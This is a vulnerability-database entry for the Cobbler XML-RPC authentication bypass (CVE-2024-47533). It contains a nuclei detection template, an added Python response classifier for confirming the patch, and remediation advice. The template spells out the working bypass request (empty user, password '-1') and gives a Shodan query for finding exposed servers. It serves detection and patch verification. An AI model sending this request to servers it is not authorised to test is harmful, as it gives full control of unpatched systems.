Cobbler 'XML-RPC' - Authentication Bypass

Published 04 Jul 2026 03:00:48. Reported by ProjectDiscovery. Type: nuclei. Source: github.com. 21 views.

Cobbler XML-RPC auth bypass lets remote attackers gain full control with empty user and -1 password.

Related

Reporter | Title | Published | Family
GithubExploit | Exploit for CVE-2024-47533 | 11 Aug 2025 20:55 | githubexploit
GithubExploit | Exploit for Code Injection in Ispconfig | 6 Sep 2025 02:27 | githubexploit
GithubExploit | Exploit for CVE-2024-47533 | 13 Aug 2025 01:25 | githubexploit
GithubExploit | Exploit for CVE-2024-47533 | 12 Aug 2025 15:49 | githubexploit
GithubExploit | Exploit for CVE-2024-47533 | 14 Aug 2025 05:28 | githubexploit
GithubExploit | Exploit for CVE-2024-47533 | 12 Aug 2025 13:52 | githubexploit
BDU FSTEC | The vulnerability of the Cobbler network installation server, related to deficiencies in authentication procedures, allows attackers to gain full access to the server. | 20 Nov 2024 00:00 | bdu_fstec
Circl | CVE-2024-47533 | 17 Nov 2024 17:08 | circl
CNNVD | Cobbler authorization problem vulnerability | 18 Nov 2024 00:00 | cnnvd
CVE | CVE-2024-47533 | 18 Nov 2024 16:33 | cve

id: CVE-2024-47533

info:
  name: Cobbler 'XML-RPC' - Authentication Bypass
  author: songyaeji
  severity: critical
  description: |
    Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `''` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue.
  impact: |
    Anyone with network access can connect to Cobbler XML-RPC with default credentials and make arbitrary changes, gaining full control.
  remediation: |
    Update Cobbler to version 3.2.3 or 3.3.7 or later.
  reference:
    - https://github.com/cobbler/cobbler/commit/32c5cada013dc8daa7320a8eda9932c2814742b0
    - https://github.com/cobbler/cobbler/commit/e19717623c10b29e7466ed4ab23515a94beb2dda
    - https://github.com/cobbler/cobbler/security/advisories/GHSA-m26c-fcgh-cp6h
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-47533
    cwe-id: CWE-287
    epss-score: 0.03948
    epss-percentile: 0.89149
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.title:"Cobbler Web Interface"
  tags: cve,cve2024,cobbler,auth-bypass,unauth,xmlrpc,vuln

http:
  - raw:
      - |
        POST /cobbler_api HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <?xml version='1.0'?>
        <methodCall>
          <methodName>login</methodName>
          <params>
            <param>
              <value><string></string></value>
            </param>
            <param>
              <value><string>-1</string></value>
            </param>
          </params>
        </methodCall>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<methodResponse>"
          - "</string></value>"
        condition: and

      - type: word
        part: content_type
        words:
          - "text/xml"

      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - "<boolean>0</boolean>"
          - "<name>faultString</name>"
        condition: or
        negative: true
# digest: 4a0a00473045022070975f7c13739c0290751ba3f93e8abc217a999203a071922702ec2924a1595b022100b613366386ad79d65281828c98a5519ba8ead1b43c4f5b45a8d4e5fdda509e1a:922c64590222798bb761d5b6d8e72950
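The matchers above deserve a closer look: the positive word matcher `</string></value>` fires on any string value in the response, including the `faultString` of an XML-RPC fault, which is exactly why the template pairs it with a negative matcher for `faultString` and `<boolean>0</boolean>`. The following Python is an added example, not part of the nuclei template or of the Cobbler project. It parses a `methodResponse` body and applies the same four conditions, so an operator can confirm that a patched Cobbler now answers the empty-user/`-1` login with a fault rather than a session token. The three response bodies are constructed samples, not captured traffic, and the function and constant names are my own.

```python
"""Classify Cobbler XML-RPC ``login`` responses using the template's matcher logic.

Added example (not part of the nuclei template). The sample responses below
are constructed for illustration, not captured from a real server.
"""
import xml.etree.ElementTree as ET

# Constructed sample: what an unpatched server answers to login('', '-1'),
# a <methodResponse> whose single param is the session token string.
VULNERABLE_RESPONSE = b"""<?xml version='1.0'?>
<methodResponse>
  <params>
    <param><value><string>constructed-session-token==</string></value></param>
  </params>
</methodResponse>"""

# Constructed sample: a patched server rejects the login with an XML-RPC fault.
# Note the faultString is itself a <string> value, so the positive matcher
# alone would still match; the negative matcher is what excludes it.
FAULT_RESPONSE = b"""<?xml version='1.0'?>
<methodResponse>
  <fault>
    <value><struct>
      <member><name>faultCode</name><value><int>1</int></value></member>
      <member><name>faultString</name><value><string>login failed</string></value></member>
    </struct></value>
  </fault>
</methodResponse>"""

# Constructed sample: a handler that signals failure as boolean 0 instead of a fault.
FALSE_RESPONSE = b"""<?xml version='1.0'?>
<methodResponse>
  <params>
    <param><value><boolean>0</boolean></value></param>
  </params>
</methodResponse>"""


def classify_login_response(body: bytes, content_type: str = "text/xml",
                            status: int = 200) -> str:
    """Return 'vulnerable', 'rejected' or 'inconclusive' for one login response.

    Mirrors the template: HTTP 200, text/xml content type, a <methodResponse>
    carrying a string value, and neither a faultString member nor
    <boolean>0</boolean> anywhere in the body.
    """
    if status != 200 or not content_type.startswith("text/xml"):
        return "inconclusive"
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return "inconclusive"
    if root.tag != "methodResponse":
        return "inconclusive"

    # Negative matcher 1: any struct member named faultString means the call failed.
    for member in root.iter("member"):
        name = member.find("name")
        if name is not None and name.text == "faultString":
            return "rejected"

    # Negative matcher 2: an explicit boolean 0 result also means failure.
    for flag in root.iter("boolean"):
        if (flag.text or "").strip() == "0":
            return "rejected"

    # Positive matcher: a non-empty string param is the session token a
    # successful login returns, i.e. the server accepted '' / '-1'.
    token = root.find("./params/param/value/string")
    if token is not None and (token.text or "").strip():
        return "vulnerable"
    return "inconclusive"


if __name__ == "__main__":
    for label, sample in (("vulnerable", VULNERABLE_RESPONSE),
                          ("fault", FAULT_RESPONSE),
                          ("boolean-0", FALSE_RESPONSE)):
        print(f"{label:>10}: {classify_login_response(sample)}")
```

Feed the function the body, content type and status of the response to the template's request; a result of `rejected` after upgrading to 3.2.3 or 3.3.7 confirms the fix took effect, while `inconclusive` (wrong content type, non-XML body, or a response with no string param) should be inspected by hand rather than treated as either outcome.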

Scores as of 04 Feb 2026 07:00: Vulners AI Score 7.2 (High risk); CVSS 3.1 9.8; EPSS 0.03948.